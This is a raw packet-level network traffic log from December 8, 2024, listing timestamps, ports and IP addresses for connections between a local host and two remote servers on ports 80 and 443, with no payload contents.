Dec 8, 2024 13:31:54.962748051 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.963294029 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.963407993 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.963417053 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.963452101 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.964152098 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.964210033 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.964229107 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.964319944 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.965030909 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.965123892 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.965147018 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.965223074 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.965936899 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.966057062 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.966068983 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.966109991 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.966738939 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.966835976 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.966862917 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.967102051 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.967588902 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.967674971 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.967695951 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.967781067 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.980938911 CET	443	49853	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:54.980961084 CET	443	49853	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:54.981046915 CET	49853	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:54.981065989 CET	443	49853	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:54.981271982 CET	49853	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:54.981271982 CET	49853	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:54.981278896 CET	443	49853	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:54.981302977 CET	49853	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:54.981420040 CET	443	49853	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:54.981442928 CET	443	49853	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:54.981512070 CET	49853	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:54.983892918 CET	49858	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:54.983918905 CET	443	49858	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:54.984055996 CET	49858	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:54.984128952 CET	49858	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:54.984137058 CET	443	49858	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:55.009922981 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.010045052 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.010067940 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.010200977 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.010282040 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.010380030 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.010411978 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.010474920 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.011504889 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.011558056 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.011584044 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.011677980 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.011989117 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.012051105 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.012237072 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.012398958 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.012413025 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.012531996 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.013112068 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.013161898 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.013219118 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.013417959 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.014029026 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.014050007 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.014085054 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.014085054 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.014836073 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.014939070 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.014997005 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.015064955 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.015644073 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.015748978 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.015758038 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.015855074 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.016535997 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.016640902 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.016661882 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.016880035 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.017443895 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.017496109 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.017522097 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.017615080 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.018237114 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.018304110 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.018402100 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.018466949 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.019143105 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.019253969 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.019273996 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.019404888 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.019918919 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.020045996 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.020076036 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.020165920 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.020757914 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.020852089 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.020895958 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.021151066 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.021595001 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.021677971 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.021739960 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.021915913 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.022475958 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.022547007 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.022629976 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.022675991 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.023349047 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.023478985 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.023502111 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.023642063 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.024281025 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.024418116 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.024439096 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.024501085 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.025053978 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.025118113 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.025202036 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.025477886 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.025866032 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.025981903 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.026002884 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.026123047 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.026731968 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.026851892 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.026858091 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.026927948 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.027688026 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.027745008 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.027939081 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.028495073 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.028575897 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.028599024 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.028662920 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.029301882 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.029413939 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.029442072 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.029531002 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.030172110 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.030339003 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.030347109 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.030430079 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.031021118 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.031091928 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.031111956 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.031347990 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.031830072 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.031910896 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.031959057 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.032094002 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.032687902 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.032834053 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.033106089 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.033560038 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.033571959 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.033660889 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.034400940 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.034516096 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.034529924 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.034579992 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.035240889 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.035326958 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.035332918 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.035398006 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.036355972 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.036874056 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.036973000 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.037206888 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.037343979 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.037355900 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.037513018 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.055480957 CET	443	49854	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:55.055505991 CET	443	49854	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:55.055743933 CET	49854	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:55.055758953 CET	443	49854	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:55.055862904 CET	49854	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:55.055862904 CET	49854	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:55.055876970 CET	443	49854	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:55.056003094 CET	443	49854	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:55.056030035 CET	443	49854	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:55.057796955 CET	49859	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:55.057825089 CET	443	49859	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:55.057857990 CET	49854	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:55.058202028 CET	49859	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:55.058202028 CET	49859	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:55.058218956 CET	443	49859	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:55.109802008 CET	443	49855	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:55.114794016 CET	443	49855	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:55.114892960 CET	49855	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:55.114960909 CET	49855	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:55.114962101 CET	49855	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:55.114981890 CET	443	49855	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:55.114989996 CET	443	49855	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:55.117381096 CET	49860	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:55.117419958 CET	443	49860	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:55.117818117 CET	49860	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:55.117818117 CET	49860	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:55.117852926 CET	443	49860	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:55.145062923 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.145364046 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.145395041 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.145533085 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.145709038 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.145730972 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.146481991 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.146646023 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.146666050 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.147278070 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.147289038 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.147346973 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.147346973 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.148061037 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.148236990 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.149005890 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.149020910 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.149105072 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.149105072 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.149955034 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.149970055 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.150019884 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.150019884 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.150577068 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.150743961 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.150769949 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.151525974 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.151551962 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.151599884 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.151690960 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.151755095 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.152311087 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.152363062 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.152484894 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.152571917 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.153243065 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.153258085 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.153340101 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.153340101 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.154036045 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.154150963 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.154337883 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.154463053 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.155103922 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.155117989 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.155441999 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.155790091 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.155930042 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.155945063 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.156590939 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.156694889 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.156719923 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.156832933 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.157807112 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.157819033 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.157951117 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.158427954 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.158440113 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.158492088 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.159271002 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.159287930 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.159354925 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.159991026 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.160058975 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.160269022 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.160377026 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.160856009 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.161042929 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.161154985 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.167404890 CET	443	49856	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:55.167939901 CET	49856	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:55.167953968 CET	443	49856	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:55.168591022 CET	49856	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:55.168596983 CET	443	49856	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:55.202111006 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.202156067 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.202255964 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.202446938 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.202552080 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.202579975 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.203337908 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.203449011 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.203475952 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.203798056 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.204195023 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.204271078 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.204289913 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.204379082 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.205063105 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.205146074 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.205158949 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.205225945 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.205899954 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.205984116 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.206000090 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.206546068 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.206733942 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.206829071 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.206857920 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.206913948 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.207633972 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.207745075 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.207770109 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.207859039 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.208468914 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.208564043 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.208626986 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.208719015 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.209296942 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.209399939 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.209420919 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.209521055 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.210141897 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.210279942 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.210447073 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.211005926 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.211121082 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.211127996 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.211236000 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.211864948 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.211935043 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.211957932 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.212040901 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.212673903 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.212760925 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.212810993 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.213009119 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.213561058 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.213655949 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.213733912 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.214515924 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.214642048 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.214715004 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.215393066 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.215506077 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.215534925 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.215631962 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.216105938 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.216181040 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.216191053 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.216248989 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.217050076 CET	80	49835	185.215.113.206	192.168.2.6
